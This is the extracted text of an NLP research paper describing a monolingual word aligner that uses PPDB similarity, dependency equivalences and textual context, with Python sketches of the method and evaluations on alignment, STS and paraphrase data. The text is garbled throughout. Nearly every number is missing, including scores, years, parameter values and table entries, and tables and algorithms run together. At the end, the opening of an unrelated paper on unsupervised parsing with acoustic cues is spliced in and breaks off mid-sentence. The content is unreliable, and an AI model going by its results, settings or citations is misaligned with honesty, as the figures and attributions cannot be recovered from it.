to identify such word pairs, we employ the paraphrase database (ppdb) . we use the largest (xxxl) of the ppdb’s lexical paraphrase packages and treat all pairs iden- tically by ignoring the accompanying statistics. we http://paraphrase.org customize the resource by removing pairs of identi- cal words or lemmas and adding lemmatized forms of the remaining pairs. for now, we use the term ppdbsim to refer to the similarity of each word pair in this modified version of ppdb (which is a value in ( , )) and later explain how we determine it (section . . ). finally, any pair of different words which is absent in ppdb is assigned a zero similarity score. . extracting contextual evidence our alignment modules collect contextual evidence from two complementary sources: syntactic depen- dencies and words occurring within a small textual vicinity of the two words to be aligned. the applica- tion of each kind assumes a common principle of min- imal evidence. formally, given two input sentences s and t , we consider two words s ∈ s and t ∈ t to form a candidate pair for alignment if ∃rs ∈ s and ∃rt ∈ t such that: . (s,t) ∈ <sim and (rs,rt) ∈ <sim, where <sim is a binary relation indicating sufficient semantic relatedness between the members of each pair (≥ ppdbsim in our case). . (s,rs) ∈ <c and (t,rt) ∈ <c , such that <c ≈<c ; where <c and <c are binary re- lations representing specific types of contextual relationships between two words in a sentence (e.g., an nsubj dependency between a verb and a noun). the symbol ≈ represents equivalence between two relationships, including identical- ity. note that the minimal-evidence assumption holds a single piece of contextual evidence as sufficient support for a potential alignment; but as we discuss later in this section, an evidence for word pair (s,t) (where s ∈ s and t ∈ s) may not lead to an align- ment if there exists a competing pair (s′, t) or (s,t′) with more evidence (where s′ ∈ s and t′ ∈ t ). in the rest of this section, we elaborate the different forms of contextual relationships we exploit along with the notion of equivalence between relationships. . . syntactic dependencies dependencies can be important sources of con- textual evidence. two nsubj children rs and rt of two verbs s ∈ s and t ∈ t , for example, pro- vide evidence for not only an (s,t) alignment, but s: he wrote a book . nsubj dobj det t : i read the book he wrote . nsubj dobj det rcmod nsubj figure : equivalent dependency types: dobj and rcmod also an (rs,rt) alignment if (s,t) ∈ <sim and (rs,rt) ∈ <sim. (we adopt the stanford typed de- pendencies (de marneffe and manning, ).) moreover, dependency types can exhibit equiva- lence; consider the two sentences in figure . the dobj dependency in s is equivalent to the rcmod dependency in t (dobj ≈ rcmod, following our ear- lier notation) since they represent the same semantic relation between identical word pairs in the two sen- tences. to be able to use such evidence for alignment, we need to go beyond exact matching of dependen- cies and develop a mapping among dependency types that encodes such equivalence. note also that the parent-child roles are opposite for the two depen- dency types in the above example, a scenario that such a mapping must accommodate. the four possible such scenarios regarding parent- child orientations are shown in figure . 
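Before walking through those orientations, it may help to make the word-similarity relation used in the two conditions above concrete. The sketch below is illustrative rather than the released implementation: ppdb_pairs stands for the customized PPDB lexical paraphrase set described earlier (identical pairs removed, lemmatized forms added), and PPDB_SIM is a hypothetical placeholder for the tuned ppdbSim value.

```python
# Illustrative sketch of the three-level word similarity described above.
# ppdb_pairs and PPDB_SIM are placeholders: ppdb_pairs stands for the
# customized PPDB lexical paraphrase set, PPDB_SIM for the tuned ppdbSim
# parameter (0.9 here is a hypothetical value, not the paper's).
PPDB_SIM = 0.9

def word_sim(word1, lemma1, word2, lemma2, ppdb_pairs):
    """Return 1.0 (exact/lemma match), PPDB_SIM (PPDB paraphrase), or 0.0."""
    # Level 1: exact word or lemma match.
    if word1.lower() == word2.lower() or lemma1.lower() == lemma2.lower():
        return 1.0
    # Level 2: the pair (or its lemmatized form) is a PPDB paraphrase.
    if (word1.lower(), word2.lower()) in ppdb_pairs or \
       (lemma1.lower(), lemma2.lower()) in ppdb_pairs:
        return PPDB_SIM
    # Level 3: no evidence of similarity.
    return 0.0
```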
if (s,t) ∈ <sim and (rs,rt) ∈ <sim (represented by bidirec- tional arrows), then each orientation represents a set of possible ways in which the s and t dependen- cies (unidirectional arrows) can provide evidence of similarity between the contexts of s in s and t in t . each such set comprises equivalent dependency type pairs for that orientation. in the example of figure , (dobj, rcmod) is such a pair for orientation (c), given s = t = “wrote” and rs = rt = “book”. we apply the notion of dependency type equiva- lence to intra-category alignment of content words in four major lexical categories: verbs, nouns, adjectives and adverbs (the stanford pos tag- ger (toutanova et al., ) is used to identify the categories). table shows dependency type equiva- lences for each lexical category of s and t. the ‘←’ sign on column of some rows repre- sents a duplication of the column content of the s rs t rt rs s rt t s rs t rt s rs t rt (a) (b) (c) (d) figure : parent-child orientations in dependencies same row. for each row, columns and show two sets of dependency types; each member of the first is equivalent to each member of the second for the current orientation (column ) and lexical categories of the associated words (columns and ). for exam- ple, row represents the fact that an agent relation (between s and rs; s is the parent) is equivalent to an nsubj relation (between t and rt; t is the parent). note that the equivalences are fundamentally re- dundant across different orientations. for example, row (which is presented as an instance of ori- entation (a)) can also be presented as an instance of orientation (b) with pos(s)=pos(t)=noun and pos(rs)=pos(rt)=verb. we avoid such redundancy for compactness. for the same reason, the equiva- lence of dobj and rcmod in figure is shown in the table only as an instance of orientation (c) and not as an instance of orientation (d) (in general, this is why orientations (b) and (d) are absent in the table). we present dependency-based contextual evidence extraction in algorithm . (the stanford dependency parser (de marneffe et al., ) is used to extract the dependencies.) given a word pair (si, tj) from the in- put sentences s and t , it collects contextual evidence (as indexes of rsi and rtj with a positive similarity) for each matching row in table . an exact match of the two dependencies is also considered a piece of evidence. note that table only considers con- tent word pairs (si, tj) such that pos(si)=pos(tj), but as % of all content word alignments in the msr alignment dev set are within the same lexical category, this is a reasonable set to start with. . . 
textual neighborhood while equivalent dependencies can provide strong contextual evidence, they can not ensure high recall because, a) the ability to accurately extract depen- orientation pos(s, t) pos(rs, rt) s dependency types t dependency types s rs t rt verb verb {purpcl, xcomp} ←− noun {agent, nsubj, xsubj} ←− {dobj, nsubjpass, rel} ←− {tmod, prep in, prep at, prep on} ←− {iobj, prep to} ←− noun verb {infmod, partmod, rcmod} ←− (a) noun {pos, nn, prep of, prep in, prep at, prep for} ←− adjective {amod, rcmod} ←− s rs t rt verb verb {conj and} ←− {conj or} ←− {conj nor} ←− noun {dobj, nsubjpass, rel} {infmod, partmod, rcmod} adjective {acomp} {cop, csubj} noun noun {conj and} ←− {conj or} ←− {conj nor} ←− adjective {amod, rcmod} {nsubj} adjective adjective {conj and} ←− {conj or} ←− (c) {conj nor} ←− adverb adverb {conj and} ←− {conj or} ←− {conj nor} ←− table : equivalent dependency structures algorithm : depcontext(s,t,i,j,eq) input: . s, t : sentences to be aligned . i: index of a word in s . j: index of a word in t . eq: dependency type equivalences (table ) output: context = {(k,l)}: pairs of word indexes context ←{(k,l) : wordsim(sk, tl) > ∧ (i,k,τs) ∈ dependencies(s) ∧ (j, l,τt) ∈ dependencies(t) ∧pos(si) = pos(tj) ∧pos(sk) = pos(tl) ∧ (τs = τt ∨ (pos(si),pos(sk),τs,τt) ∈ eq))} dencies is limited by the accuracy of the parser, and b) we investigate equivalence types for only inter- lexical-category alignment in this study. therefore we apply an additional model of word context: the textual neighborhood of s in s and t in t . extraction of contextual evidence for content words from textual neighborhood is described in al- gorithm . like the dependency-based module, it accumulates evidence for each (si, tj) pair by in- specting multiple pairs of neighboring words. but in- stead of aligning only words within a lexical category, algorithm : textcontext(s,t,i,j, stop) input: . s, t : sentences to be aligned . i: index of a word in s . j: index of a word in t . stop: a set of stop words output: context = {(k,l)}: pairs of word indexes ci ←{k : k ∈ [i− , i + ] ∧k = i∧sk ∈ stop} cj ←{l : l ∈ [j − ,j + ] ∧ l = j ∧ tl ∈ stop} context ← ci ×cj this module also performs inter-category alignment, considering content words within a ( , ) window of si and tj as neighbors. we implement relational equivalence (≈) here by holding any two positions within the window equally contributive and mutually comparable as sources of contextual evidence. . the alignment algorithm we now describe each alignment module in the pipeline and their sequence of operation. . . identical word sequences the presence of a common word sequence in s and t is indicative of an (a) identical, and (b) con- textually similar word in the other sentence for each word in the sequence. we observe the results of aligning identical words in such sequences of length n containing at least one content word. this simple heuristic demonstrates a high precision (≈ %) on the msr alignment dev set for n ≥ , and therefore we consider membership in such sequences as the simplest form of contextual evidence in our system and align all identical word sequence pairs in s and t containing at least one content word. from this point on, we will refer to this module as wsalign. . . named entities we align named entities separately to enable the alignment of full and partial mentions (and acronyms) of the same entity. we use the stanford named entity recognizer (finkel et al., ) to identify named entities in s and t . 
after aligning the exact term matches, any unmatched term of a partial mention is aligned to all terms in the full mention. the mod- ule recognizes only first-letter acronyms and aligns an acronym to all terms in the full mention of the corresponding name. since named entities are instances of nouns, named entity alignment is also informed by contextual ev- idence (which we discuss in the next section), but happens before alignment of other generic content words. parents (or children) of a named entity are simply the parents (or children) of its head word. we will refer to this module as a method named nealign from this point on. . . content words extraction of contextual evidence for promising content word pairs has already been discussed in section . , covering both dependency-based context and textual context. algorithm (cwdepalign) describes the dependency-based alignment process. for each potentially alignable pair (si, tj), the dependency- based context is extracted as described in algorithm , and context similarity is calculated as the sum of the word similarities of the (sk, tl) context word pairs (lines - ). (the wordsim method returns a similarity score in { , ppdbsim, }.) the alignment score of the (si, tj) pair is then a weighted sum of word and contextual similarity (lines - ). (we discuss how the weights are set in section algorithm : cwdepalign(s,t,eq,ae,w, stop) input: . s, t : sentences to be aligned . eq: dependency type equivalences (table ) . ae: already aligned word pair indexes . w: weight of word similarity relative to contex- tual similarity . stop: a set of stop words output: a = {(i,j)}: word index pairs of aligned words {(si, tj)} where si ∈ s and tj ∈ t Ψ ← ∅; ΛΨ ← ∅; Φ ← ∅ for si ∈ s,tj ∈ t do if si ∈ stop ∧¬∃tl : (i, l) ∈ ae ∧ tj ∈ stop ∧¬∃sk : (k,j) ∈ ae ∧wordsim(si, tj) > then context ← depcontext(s,t,i,j,eq) contextsim ← ∑ (k,l)∈context wordsim(sk, tl) if contextsim > then Ψ ← Ψ ∪{(i,j)} ΛΨ(i,j) ← context Φ(i,j) ← w ∗wordsim(si, tj) +( −w) ∗ contextsim linearize and sort Ψ in decreasing order of Φ(i,j) a ← ∅ for (i,j) ∈ Ψ do if ¬∃l : (i, l) ∈ a ∧¬∃k : (k,j) ∈ a then a ← a∪{(i,j)} for (k,l) ∈ ΛΨ(i,j) do if ¬∃q : (k,q) ∈ a∪ae ∧¬∃p : (p,l) ∈ a∪ae then a ← a∪{(k,l)} . . .) the module then aligns (si, tj) pairs with non-zero evidence in decreasing order of this score (lines - ). in addition, it aligns all the pairs that contributed contextual evidence for the (si, tj) alignment (lines - ). note that we implement a one-to-one alignment whereby a word gets aligned at most once within the module. algorithm (cwtextalign) presents alignment based on similarities in the textual neighborhood. for each potentially alignable pair (si, tj), algorithm is used to extract the context, which is a set of neigh- boring content word pairs (lines - ). the contextual similarity is the sum of the similarities of these pairs algorithm : cwtextalign(s,t,ae,w, stop) input: . s, t : sentences to be aligned . ae: existing alignments by word indexes . w: weight of word similarity relative to contex- tual similarity . 
stop: a set of stop words output: a = {(i,j)}: word index pairs of aligned words {(si, tj)} where si ∈ s and tj ∈ t Ψ ← ∅; Φ ← ∅ for si ∈ s, tj ∈ t do if si ∈ stop ∧¬∃tl : (i, l) ∈ ae ∧ tj ∈ stop ∧¬∃sk : (k,j) ∈ ae ∧wordsim(si, tj) > then Ψ ← Ψ ∪{(i,j)} context ← textcontext(s,t,i,j, stop) contextsim ← ∑ (k,l)∈context wordsim(sk, tl) Φ(i,j) ← w ∗wordsim(si, tj) + ( −w) ∗ contextsim linearize and sort Ψ in decreasing order of Φ(i,j) a ← ∅ for (i,j) ∈ Ψ do if ¬∃l : (i, l) ∈ a ∧¬∃k : (k,j) ∈ a then a ← a∪{(i,j)} (line ), and the alignment score is a weighted sum of word similarity and contextual similarity (lines , ). the alignment score is then used to make one-to-one word alignment decisions (lines - ). considering textual neighbors as weaker sources of evidence, we do not align the neighbors. note that in cwtextalign we also align semanti- cally similar content word pairs (si, tj) with no con- textual similarities if no pairs (sk, tj) or (si, tl) exist with a higher alignment score. this is a consequence of our observation of the msr alignment dev data, where we find that more often than not content words are inherently sufficiently meaningful to be aligned even in the absence of contextual evidence when there are no competing pairs. the content word alignment module is thus itself a pipeline of cwdepalign and cwtextalign. . . stop words we follow the contextual evidence-based approach to align stop words as well, some of which get aligned algorithm : align(s,t,eq,w, stop) input: . s, t : sentences to be aligned . eq: dependency type equivalences (table ) . w: weight of word similarity relative to contex- tual similarity . stop: a set of stop words output: a = {(i,j)}: word index pairs of aligned words {(si, tj)} where si ∈ s and tj ∈ t a ← wsalign(s,t) a ← a∪nealign(s,t,eq,a,w) a ← a∪ cwdepalign(s,t,eq,a,w, stop) a ← a∪ cwtextalign(s,t,a,w, stop) a ← a∪swdepalign(s,t,a,w, stop) a ← a∪swtextalign(s,t,a,w, stop) as part of word sequence alignment as discussed in section . . , and neighbor alignment as discussed in section . . . for the rest we utilize dependen- cies and textual neighborhoods as before, with three adjustments. firstly, since stop word alignment is the last mod- ule in our pipeline, rather than considering all se- mantically similar word pairs for contextual similar- ity, we consider only aligned pairs. secondly, since many stop words (e.g. determiners, modals) typi- cally demonstrate little variation in the dependencies they engage in, we ignore type equivalences for stop words and implement only exact matching of depen- dencies. (stop words in general can participate in equivalent dependencies, but we leave constructing a corresponding mapping for future work.) finally, for textual neighborhood, we separately check align- ments of the left and the right neighbors and aggre- gate the evidences to determine alignment – again due to the primarily syntactic nature of interaction of stop words with their neighbors. thus stop words are also aligned in a sequence of dependency and textual neighborhood-based align- ments. we assume two corresponding modules named swdepalign and swtextalign, respectively. . . the algorithm our full alignment pipeline is shown as the method align in algorithm . note that the strict order of the alignment modules limits the scope of downstream modules since each such module discards any word that has already been aligned by an earlier module (this is accomplished via the variable a; the corre- sponding parameter in algorithms and is ae). 
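To summarize the control flow of the align method just described, the pipeline and its accumulating alignment set can be sketched as follows. This is an illustrative sketch, not the released code: the module interface is simplified (the algorithms in the text also receive the equivalence table, the weight w, and the stop-word list), and greedy_one_to_one shows the score-ordered one-to-one decision rule used by the content-word modules.

```python
def align(s, t, modules):
    """Run alignment modules in the fixed order described above.

    `modules` is a list of callables, each mapping (s, t, aligned) to a set of
    new (i, j) word-index pairs and skipping words already in `aligned`
    (the set called A in the text, passed to later modules as ae).
    Expected order: ws_align, ne_align, cw_dep_align, cw_text_align,
    sw_dep_align, sw_text_align.
    """
    aligned = set()
    for module in modules:
        aligned |= module(s, t, aligned)
    return aligned

def greedy_one_to_one(candidates):
    """candidates: iterable of (score, i, j); highest-scoring pairs win."""
    chosen, used_s, used_t = set(), set(), set()
    for score, i, j in sorted(candidates, reverse=True):
        if i not in used_s and j not in used_t:
            chosen.add((i, j))
            used_s.add(i)
            used_t.add(j)
    return chosen
```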
the rationales behind the specific order of the mod- ules can now be explained: ( ) wsalign is a module with relatively higher precision, ( ) it is convenient to align named entities before other content words to en- able alignment of entity mentions of different lengths, ( ) dependency-based evidence was observed to be more reliable (i.e. of higher precision) than textual evidence in the msr alignment dev set, and ( ) stop word alignments are dependent on existing content word alignments. the aligner assumes two free parameters: ppdbsim and w (in algorithms and ). to determine their values, we exhaustively search through the two-dimensional space (ppdbsim,w) for ppdbsim,w ∈{ . , ..., . , } and the combina- tion ( . , . ) yields the best f score for the msr alignment dev set. we use these values for the aligner in all of its subsequent applications. evaluation we evaluate the performance of our aligner both in- trinsically and extrinsically on multiple corpora. . intrinsic evaluation the msr alignment dataset (brockett, ) was designed to train and directly evaluate automated aligners. three annotators individually aligned words and phrases in pairs of premise and hypothe- sis sentences from the rte challenge data (divided into dev and test sets, each consisting of sen- tences). the dataset has subsequently been used to assess several top performing aligners (maccartney et al., ; thadani and mckeown, ; yao et al., a; yao et al., b). we use the test set for evaluation in the same manner as these studies: (a) we apply majority rule to select from the three sets of annotations for each sentence and discard three- way disagreements, (b) we evaluate only on the sure links (word pairs that annotators mentioned should certainly be aligned, as opposed to possible links). we test the generalizability of the aligner by eval- uating it, unchanged (i.e. with identical parameter values), on a second alignment corpus: the edin- http://www.cs.biu.ac.il/ nlp/files/rte aligned.zip system p% r% f % e% m sr maccartney et al. ( ) . . . . thadani & mckeown ( ) . . . . yao et al. ( a) . . . . yao et al. ( b) . . . . this work . . . . e d b ++ yao et al. ( a) . . . . yao et al. ( b) . . . . this work . . . . table : results of intrinsic evaluation on two datasets burgh++ (thadani et al., ) corpus. the test set consists of pairs; each pair is aligned by at most two annotators and we adopt the random selection policy described in (thadani et al., ) to resolve disagreements. table shows the results. for each corpus, it shows precision (% alignments that matched with gold annotations), recall (% gold alignments discov- ered by the aligner), f score and the percentage of sentences that received the exact gold alignments (denoted by e) from the aligner. on the msr test set, our aligner shows a . % improvement in f score over the previous best sys- tem (yao et al., a) with a . % error reduction. importantly, it demonstrates a considerable increase in recall without a loss of precision. the e score also increases as a consequence. on the edinburgh++ test set, our system achieves a . % increase in f score (an error reduction of . %) over the previous best system (yao et al., a), with improvements in both precision and recall. this is a remarkable result that demonstrates the general applicability of the aligner, as no parameter tuning took place. . . ablation test we perform a set of ablation tests to assess the importance of the aligner’s individual components. 
each row of table beginning with (-) shows a fea- ture excluded from the aligner and two associated sets of metrics, showing the performance of the re- sulting algorithm on the two alignment corpora. without a word similarity module, recall drops as would be expected. without contextual evidence (word sequences, dependencies and textual neigh- bors) precision drops considerably and recall also falls. without dependencies, the aligner still gives http://www.ling.ohio-state.edu/∼scott/#edinburgh-plusplus msr edb++ feature p% r% f % p% r% f % original . . . . . . (-) word similarity . . . . . . (-) contextual evidence . . . . . . (-) dependencies . . . . . . (-) text neighborhood . . . . . . (-) stop words . . . . . . table : ablation test results state-of-the-art results, which points to the possibility of a very fast yet high-performance aligner. without evidence from textual neighbors, however, the preci- sion of the aligner suffers badly. textual neighbors find alignments across different lexical categories, a type of alignment that is currently not supported by our dependency equivalences. extending the set of dependency equivalences might alleviate this is- sue. finally, without stop words (i.e. while aligning content words only) recall drops just a little for each corpus, which is expected as content words form the vast majority of non-identical word alignments. . extrinsic evaluation we extrinsically evaluate our system on textual simi- larity identification and paraphrase detection. here we discuss each task and the results of evaluation. . . semantic textual similarity given two short input text fragments (commonly sentences), the goal of this task is to identify the degree to which the two fragments are semantically similar. the *sem sts task (agirre et al., ) assessed a number of sts systems on four test datasets by comparing their output scores to human annotations. pearson correlation coefficient with hu- man annotations was computed individually for each test set and a weighted sum of the correlations was used as the final evaluation metric (the weight for each dataset was proportional to its size). we apply our aligner to the task by aligning each sentence pair and taking the proportion of content words aligned in the two sentences (by normalizing with the harmonic mean of their number of content words) as a proxy of their semantic similarity. only three of the four sts datasets are freely avail- able (headlines, onwn, and fnwn), which we use for our experiments (leaving out the smt dataset). http://ixa .si.ehu.es/sts/ system correl.% rank han et al. ( ) . (original) jacanaalign . this work . table : extrinsic evaluation on sts data these three sets contain annotated sentence pairs in total. table shows the results. the first row shows the performance of the top system in the task. with a direct application of our aligner (no parameter tun- ing), our sts algorithm acheives a . % weighted correlation, which would earn it the th rank among participating systems. considering the fact that alignment is one of many components of sts, this result is truly promising. for comparison, we also evaluate the previous best aligner named jacanaalign (yao et al., a) on sts data (the jacanaalign public release is used, which is a version of the original aligner with extra lexical resources). we apply three different val- ues derived from its output as proxies of semantic similarity: a) aligned content word proportion, b) the viterbi decoding score, and c) the normalized decod- ing score. 
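For reference, the similarity proxy used for our own aligner at the start of this subsection (the proportion of aligned content words, normalized by the harmonic mean of the two sentences' content-word counts) can be sketched as below. This is one plausible reading of that description, not the exact scoring code of the released system; content-word identification is assumed to be done elsewhere.

```python
# Sketch of the STS similarity proxy described earlier in this subsection:
# aligned content words, normalized by the harmonic mean of the two
# sentences' content-word counts.

def sts_score(content_idx_s, content_idx_t, alignments):
    """content_idx_s/t: sets of content-word indexes; alignments: (i, j) pairs."""
    if not content_idx_s or not content_idx_t:
        return 0.0
    n_aligned = sum(1 for i, j in alignments
                    if i in content_idx_s and j in content_idx_t)
    harmonic_mean = (2.0 * len(content_idx_s) * len(content_idx_t)
                     / (len(content_idx_s) + len(content_idx_t)))
    return n_aligned / harmonic_mean
```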
of the three, (b) gives the best results, which we show in row of table . our aligner outperforms jacanaalign by a large margin. . . paraphrase identification the goal of paraphrase identification is to decide if two sentences have the same meaning. the output is a yes/no decision instead of a real-valued similarity score as in sts. we use the msr paraphrase cor- pus ( dev pairs, test pairs) (dolan et al., ) to evaluate our aligner and compare with other aligners. following earlier work (maccartney et al., ; yao et al., b), we use a normalized align- ment score of the two sentences to make a decision based on a threshold which we set using the dev set. alignments with a higher-than-threshold score are taken to be paraphrases and the rest non-paraphrases. again, this is an oversimplified application of the aligner, even more so than in sts, since a small change in linguistic properties of two sentences (e.g. polarity or modality) can turn them into non- https://code.google.com/p/jacana/ http://research.microsoft.com/en-us/downloads/ d d - cd- e - bc-a f cd / system acc.% p% r% f % madnani et al. ( ) . . . . yao et al. ( a) . . . . yao et al. ( b) . . . . this work . . . . table : extrinsic evaluation on msr paraphrase data paraphrases despite having a high degree of align- ment. so the aligner was not expected to demonstrate state-of-the-art performance, but still it gets close as shown in table . the first column shows the accu- racy of each system in classifying the input sentences into one of two classes: true (paraphrases) and false (non-paraphrases). the rest of the columns show the performance of the system for the true class in terms of precision, recall, and f score. italicized numbers represent scores that were not reported by the authors of the corresponding papers, but have been recon- structed from the reported data (and hence are likely to have small precision errors). the first row shows the best performance by any system on the test set to the best of our knowledge. the next two rows show the performances of two state-of-the-art aligners (performances of both sys- tems were reported in (yao et al., b)). the last row shows the performance of our aligner. al- though it does worse than the best paraphrase system, it outperforms the other aligners. discussion our experiments reveal that a word aligner based on simple measures of lexical and contextual similar- ity can demonstrate state-of-the-art accuracy. how- ever, as alignment is frequently a component of larger tasks, high accuracy alone is not always sufficient. other dimensions of an aligner’s usability include speed, consumption of computing resources, replica- bility, and generalizability to different applications. our design goals include achieving a balance among such multifarious and conflicting goals. a speed advantage of our aligner stems from for- mulating the problem as one-to-one word alignment and thus avoiding an expensive decoding phase. the presence of multiple phases is offset by discarding already aligned words in subsequent phases. the use of ppdb as the only (hashable) word similarity resource helps in reducing latency as well as space requirements. as shown in section . . , further speedup could be achieved with only a small perfor- mance degradation by considering only the textual neighborhood as source of contextual evidence. however, the two major goals that we believe the aligner achieves to the greatest extent are replicabil- ity and generalizability. 
the easy replicability of the aligner stems from its use of only basic and fre- quently used nlp modules (a lemmatizer, a pos tagger, an ner module, and a dependency parser: all available as part of the stanford corenlp suite ; we use a python wrapper ) and a single word similarity resource (ppdb). we experimentally show that the aligner can be successfully applied to different alignment datasets as well as multiple end tasks. we believe a design characteristic that enhances the generalizability of the aligner is its minimal dependence on the msr alignment training data, which originates from a tex- tual entailment corpus having unique properties such as disparities in the lengths of the input sentences and a directional nature of their relationship (i.e., the premise implying the hypothesis, but not vice versa). a related potential reason is the symmetry of the aligner’s output (caused by its assumption of no directionality) – the fact that it outputs the same set of alignments regardless of the order of the input sentences, in contrast to most existing aligners. major limitations of the aligner include the inabil- ity to align phrases, including multiword expressions. it is incapable of capturing and exploiting long dis- tance dependencies among words (e.g. coreferences). no word similarity resource is perfect and ppdb is no exception, therefore certain word alignments also remain undetected. conclusions we show how contextual evidence can be used to construct a monolingual word aligner with certain de- sired properties, including state-of-the-art accuracy, easy replicability, and high generalizability. some potential avenues for future work include: allow- ing phrase-level alignment via phrasal similarity re- sources (e.g. the phrasal paraphrases of ppdb), in- cluding other sources of similarity such as vector space models or wordnet relations, expanding the set http://nlp.stanford.edu/downloads/corenlp.shtml https://github.com/dasmith/stanford-corenlp-python of dependency equivalences and/or using semantic role equivalences, and formulating our alignment al- gorithm as objective optimization rather than greedy search. the aligner is available for download at https://github.com/ma-sultan/ monolingual-word-aligner. acknowledgments this material is based in part upon work supported by the national science foundation under grant num- bers ehr/ and ehr/ . any opin- ions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the na- tional science foundation. references eneko agirre, daniel cer, mona diab, aitor gonzalez- agirre, and weiwei guo. . *sem shared task: semantic textual similarity. in proceedings of the second joint conference on lexical and compu- tational semantics. association for computational linguistics, - . colin bannard and chris callison-burch. . para- phrasing with bilingual parallel corpora. in proceed- ings of the rd annual meeting on association for computational linguistics. association for computa- tional linguistics, - . daniel bär, chris biemann, iryna gurevych, and torsten zesch. . ukp: computing semantic textual sim- ilarity by combining multiple content similarity mea- sures. in proceedings of the first joint conference on lexical and computational semantics. association for computational linguistics, - . roy bar-haim, ido dagan, bill dolan, lisa ferro, danilo giampiccolo, bernardo magnini, and idan szpektor. . the second pascal recognising textual en- tailment challenge. 
in proceedings of the second pascal recognising textual entailment challenge. chris brockett. . aligning the rte cor- pus. technical report msr-tr- - , microsoft research. nathanael chambers, daniel cer, trond grenager, david hall, chloe kiddon, bill maccartney, marie-catherine de marneffe, daniel ramage, eric yeh, and christopher d manning. . learning alignments and leverag- ing natural logic. in proceedings of the acl-pascal workshop on textual entailment and paraphrasing as- sociation for computational linguistics, - . ming-wei chang, dan goldwasser, dan roth, and vivek srikumar. . discriminative learning over con- strained latent representations. in proceedings of the annual conference of the north american chap- ter of the association for computational linguistics association for computational linguistics, - . dipanjan das and noah a. smith. . paraphrase iden- tication as probabilistic quasi-synchronous recogni- tion. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp. association for computational linguistics, - . marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the international conference on lan- guage resources and evaluation. - . marie-catherine de marneffe and christopher d. man- ning. . stanford typed dependencies manual. technical report, stanford university. bill dolan, chris quirk, and chris brockett. . un- supervised construction of large paraphrase corpora: exploiting massively parallel news sources. in pro- ceedings of the international conference on compu- tational linguistics. association for computational linguistics, - . jenny rose finkel, trond grenager, and christopher man- ning. . incorporating non-local information into information extraction systems by gibbs sampling. in proceedings of the rd annual meeting of the associ- ation for computational linguistics. association for computational linguistics, - . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in proceedings of the conference of the north american chapter of the association for com- putational linguistics. association for computational linguistics, - . lushan han, abhay kashyap, tim finin, james mayeld, and jonathan weese. . umbc ebiquity-core: semantic textual similarity systems. in proceedings of the second joint conference on lexical and compu- tational semantics, volume . association for compu- tational linguistics, - . andrew hickl and jeremy bensley. . a discourse commitment-based framework for recognizing tex- tual entailment. in proceedings of the acl-pascal workshop on textual entailment and paraphrasing. as- sociation for computational linguistics, - . andrew hickl, jeremy bensley, john williams, kirk roberts, bryan rink, and ying shi. . recog- nizing textual entailment with lccs groundhog system. in proceedings of the second pascal chal- lenges workshop on recognizing textual entailment. milen kouylekov and bernardo magnini. . rec- ognizing textual entailment with tree edit distance al- gorithms. in proceedings of the pascal challenges workshop: recognising textual entailment challenge - . bill maccartney, michel galley, and christopher d. man- ning. . a phrase-based alignment model for nat- ural language inference. in proceedings of the conference on empirical methods in natural language processing. 
association for computational linguistics, - . nitin madnani, joel tetreault, and martin chodorow. . re-examining machine translation metrics for paraphrase identification. in proceedings of con- ference of the north american chapter of the associ- ation for computational linguistics. association for computational linguistics, - . kapil thadani and kathleen mckeown. . optimal and syntactically-informed decoding for monolingual phrase-based alignment. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies. associa- tion for computational linguistics, - . kapil thadani, scott martin, and michael white. . a joint phrasal and dependency model for paraphrase alignment. in proceedings of coling : posters. - . kristina toutanova, dan klein, christopher d. manning, and yoram singer. feature-rich part-of-speech tagging with a cyclic dependency network in pro- ceedings of the human language technology conference of the north american chapter of the asso- ciation for computational linguistics. association for computational linguistics, - . xuchen yao, benjamin van durme, chris callison-burch, and peter clark. a. a lightweight and high per- formance monolingual word aligner. in proceedings of the st annual meeting of the association for com- putational linguistics. association for computational linguistics, - . xuchen yao, benjamin van durme, chris callison-burch, and peter clark. b. semi-markov phrase-based monolingual alignment. in proceedings of the conference on empirical methods in natural language processing. association for computational linguistics, - . xuchen yao, benjamin van durme, chris callison-burch, and peter clark. c. answer extraction as se- quence tagging with tree edit distance. in proceed- ings of the conference of the north american chapter of the association for computational linguis- tics. association for computational linguistics, - . unsupervised dependency parsing with acoustic cues john k pate (j.k.pate@sms.ed.ac.uk) sharon goldwater (sgwater@inf.ed.ac.uk) school of informatics, university of edinburgh crichton st., edinburgh eh ab, uk abstract unsupervised parsing is a difficult task that infants readily perform. progress has been made on this task using text-based models, but few computational approaches have considered how infants might benefit from acoustic cues. this paper explores the hypothesis that word duration can help with learning syntax. we de- scribe how duration information can be incor- porated into an unsupervised bayesian depen- dency parser whose only other source of infor- mation is the words themselves (without punc- tuation or parts of speech). our results, evalu- ated on both adult-directed and child-directed utterances, show that using word duration can improve parse quality relative to words-only baselines. these results support the idea that acoustic cues provide useful evidence about syntactic structure for language-learning in- fants, and motivate the use of word duration cues in nlp tasks with speech. introduction unsupervised learning of syntax is difficult for nlp systems, yet infants perform this task routinely. pre- vious work in nlp has focused on using the implicit syntactic information available in part-of-speech (pos) tags (klein and manning, ), punctuation (seginer, ; spitkovsky et al., b; ponvert et al., ), and syntactic similarities between related languages (cohen and smith, ; cohen et al., ). 
however, these approaches likely use the data in a very different way from children: neither pos tags nor punctuation are observed during language acquisition (although see spitkovsky et al. ( a) and christodoulopoulos et al. ( ) for encouraging results using unsupervised pos tags), and many children learn in a broadly monolingual environment. this paper explores a possible source of information that nlp systems typically ignore: word duration, or the length of time taken to pronounce each word. there are good reasons to think that word duration might be useful for learning syntax. first, the well-established prosodic bootstrapping hypothesis (gleitman and wanner, ) proposes that infants use acoustic-prosodic cues (such as word duration) to help them identify syntactic structure, because prosodic and syntactic structures sometimes coincide. more recently, we proposed (pate and goldwater, ) that infants might use word duration as a direct cue to syntactic structure (i.e., without requiring intermediate prosodic structure), because words in high-probability syntactic structures tend to be pronounced more quickly (gahl and garnsey, ; gahl et al., ; tily et al., ). like most recent work on unsupervised parsing, we focus on learning syntactic dependencies. our work is based on headden et al. ( )'s bayesian version of the dependency model with valence (dmv) (klein and manning, ), using interpolated backoff techniques to incorporate multiple information sources per token. however, whereas headden et al. used words and pos tags as input, we use words and word duration information, presenting three variants of their model that use this information in slightly different ways. by using neither gold-standard nor learned 